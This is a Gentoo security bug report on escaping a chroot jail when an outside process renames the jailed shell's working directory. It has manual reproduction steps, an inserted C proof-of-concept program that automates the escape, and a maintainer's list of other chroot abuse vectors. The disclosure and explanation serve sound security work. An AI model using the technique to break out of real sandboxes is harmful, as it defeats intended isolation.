Bug 48872 - Escaping from chroot with help from outside by moving out current working directory
Status: RESOLVED CANTFIX
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High major
Assignee: Gentoo Security
Reported: 2004-04-24 05:13 UTC by Tim Weber
Modified: 2011-10-30 22:38 UTC
Description Tim Weber 2004-04-24 05:13:38 UTC
It looks to me that it is possible to escape from a chroot jail with help from outside. Specifically, when someone not inside the chroot moves out the current working directory of someone inside the chroot, the guy inside can use multiple "cd .."'s to finally get to the real root directory.

Reproducible: Always
Steps to Reproduce:
1. Create a directory called "/new" and copy a Gentoo stage1 tarball inside to make it somewhat usable. Create a directory called "/new.store"
2. Open up two root shells. (Maybe this works with user shells as well, didn't try it.)
3. Do the following commands in shell A:
serv0r root # cd / 
serv0r / # chroot /new /bin/bash 
serv0r / # cd usr 
serv0r usr # mkdir escape 
serv0r usr # cd escape
4. Do the following command in shell B:
serv0r root # mv /new/usr/escape /new.store/
5. Do the following commands in shell A:
serv0r escape # ls 
serv0r escape # pwd 
/usr/escape 
serv0r escape # cd .. 
serv0r new.store # ls 
escape  usr 
serv0r new.store # pwd 
/new.store
Actual Results:  
As you can see, the chrooted shell A can now access the directory 
"/new.store". By using "cd .." again he would be able to change to the real 
root directory, despite being chrooted to "/new". 

Expected Results:  
Either 
a) Disallow the "mv" of the current working directory of shell A's user or 
b) Put shell A's user inside "/usr" (which in fact is "/new/usr") after the 
"cd ..". 

I posted this about one or two weeks ago in the forums 
(http://forums.gentoo.org/viewtopic.php?t=160772), but didn't have time to 
file a bug report. 
 
This has NOT been tested with up-to-date software, but was reproduced by 
forums moderator tomk, I guess he was using current packages. 
 
I was using chroot 5.0 (from coreutils-5.0-r5) and some older kernel (about 
2.4.22). Sorry I didn't check the precise kernel version, but I had very 
little time at that moment.
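The two-shell procedure above, reproduced as one program. This is an added example, not code from the report or from Gentoo: the child process plays shell A, the parent plays shell B, and a pipe replaces the manual switching between terminals. The directory names (a mkdtemp() base holding jail/usr/escape and store), the marker.txt file used to prove the escape, and the --chroot flag are this example's own choices. Run unprivileged it shows the underlying kernel semantics without chroot(2); run as root with --chroot it performs the actual chroot and reproduces the report.

```c
/* Added example: cwd moved out from under a chroot.  cc -Wall -o moved_cwd moved_cwd.c
 * ./moved_cwd            unprivileged: directory-object semantics only
 * sudo ./moved_cwd --chroot   real chroot(2), the report's shell A / shell B */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

static void wr(int fd, const void *p, size_t n)      /* write fully or give up */
{
    while (n > 0) {
        ssize_t w = write(fd, p, n);
        if (w <= 0) return;
        p = (const char *)p + w; n -= (size_t)w;
    }
}

static size_t rd_all(int fd, char *buf, size_t len)  /* read until EOF */
{
    size_t got = 0;
    for (ssize_t n; got + 1 < len && (n = read(fd, buf + got, len - got - 1)) > 0;)
        got += (size_t)n;
    buf[got] = '\0';
    return got;
}

/* Child = shell A, parent = shell B.  Returns 1 if, after B renamed A's cwd out
 * of the jail and A did "cd ..", A can stat a marker file that exists only
 * outside the jail; 0 if not; -1 on setup error (e.g. chroot() without root).
 * cwd_out receives what getcwd() reported in A afterwards. */
int moved_cwd_escape(int use_chroot, char *cwd_out, size_t cwd_len)
{
    /* Layout (this example's naming): <base>/jail/usr/escape is where A sits,
     * <base>/store is where B moves it, marker.txt lives in <base>/store. */
    char base[] = "/tmp/chrootmvXXXXXX", jail[64], usr[64], escape[64],
         store[64], moved[64], marker[64], buf[512];
    int p2c[2], c2p[2], mfd, result = -1;

    if (!mkdtemp(base)) return -1;
    snprintf(jail, sizeof jail, "%s/jail", base);
    snprintf(usr, sizeof usr, "%s/usr", jail);
    snprintf(escape, sizeof escape, "%s/escape", usr);
    snprintf(store, sizeof store, "%s/store", base);
    snprintf(moved, sizeof moved, "%s/escape", store);
    snprintf(marker, sizeof marker, "%s/marker.txt", store);
    if (mkdir(jail, 0755) || mkdir(usr, 0755) || mkdir(escape, 0755) ||
        mkdir(store, 0755) || (mfd = open(marker, O_CREAT | O_WRONLY, 0644)) < 0 ||
        pipe(p2c) || pipe(c2p))
        return -1;
    close(mfd);

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                                  /* shell A */
        close(p2c[1]); close(c2p[0]);
        int ok = use_chroot ? chroot(jail) == 0 && chdir("/usr/escape") == 0
                            : chdir(escape) == 0;
        if (!ok) { wr(c2p[1], "E", 1); _exit(1); }
        wr(c2p[1], "R", 1);                          /* ready: cwd refers to escape */
        char go;
        if (read(p2c[0], &go, 1) != 1) _exit(1);     /* wait for B's mv */
        /* "cd ..": the kernel takes the parent of the directory object itself,
         * which is now <base>/store, outside the jail; no path string is involved. */
        if (chdir("..") != 0) { wr(c2p[1], "E", 1); _exit(1); }
        struct stat st;
        char seen = stat("marker.txt", &st) == 0 ? '1' : '0', cwd[256];
        if (!getcwd(cwd, sizeof cwd))
            snprintf(cwd, sizeof cwd, "(getcwd failed: %s)", strerror(errno));
        wr(c2p[1], &seen, 1); wr(c2p[1], cwd, strlen(cwd));
        _exit(0);
    }
    close(p2c[0]); close(c2p[1]);                    /* shell B */
    char ready;
    if (read(c2p[0], &ready, 1) == 1 && ready == 'R' && rename(escape, moved) == 0) {
        wr(p2c[1], "G", 1);
        if (rd_all(c2p[0], buf, sizeof buf) >= 1 && buf[0] != 'E') {
            result = buf[0] == '1';
            snprintf(cwd_out, cwd_len, "%s", buf + 1);
        }
    }
    close(p2c[1]); close(c2p[0]);
    waitpid(pid, NULL, 0);
    unlink(marker); rmdir(moved); rmdir(escape); rmdir(store);
    rmdir(usr); rmdir(jail); rmdir(base);
    return result;
}

/* Unprivileged run with the checks a test makes: the marker is reachable and the
 * cwd reported after "cd .." is <base>/store, nowhere under the jail. */
int demo_unprivileged(void)
{
    char cwd[256] = "";
    return moved_cwd_escape(0, cwd, sizeof cwd) == 1 &&
           strstr(cwd, "/store") != NULL && strstr(cwd, "jail") == NULL;
}

int main(int argc, char **argv)
{
    char cwd[256] = "";
    int use_chroot = argc > 1 && strcmp(argv[1], "--chroot") == 0;
    int r = moved_cwd_escape(use_chroot, cwd, sizeof cwd);
    printf("chroot=%d escaped=%d cwd after cd ..: %s\n", use_chroot, r, cwd);
    return r == 1 ? 0 : 1;
}
```

The point the example makes is that a process's cwd (like its root) is a reference to a directory object, not a saved path string; rename(2) moves the object, so the next ".." lookup starts from wherever it now is, and the chroot root is only honoured when a lookup actually passes through it. One caveat when running with --chroot on a current system: the kernel reports a cwd that is not reachable from the process root as "(unreachable)/...", and recent glibc turns that into a getcwd() failure with ENOENT, so the printed cwd will differ from the "/new.store" that bash's pwd showed in the 2004 transcript. The stat of marker.txt still succeeds, which is the escape itself.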
Comment 1 solar (RETIRED) gentoo-dev 2004-04-24 09:22:26 UTC
We can't fix this.
What you're talking about goes into the fundamental design of the kernel.

Note: There are also other ways to abuse a default chroot setup that don't require
external forces to help you, including iopl, shmat, ptrace, kill, mount, fchdir, 
AF_UNIX sockets, chmod, mknod.

Changing resolution to CANTFIX
If you feel that we can fix this somehow then please attach a patch and reopen.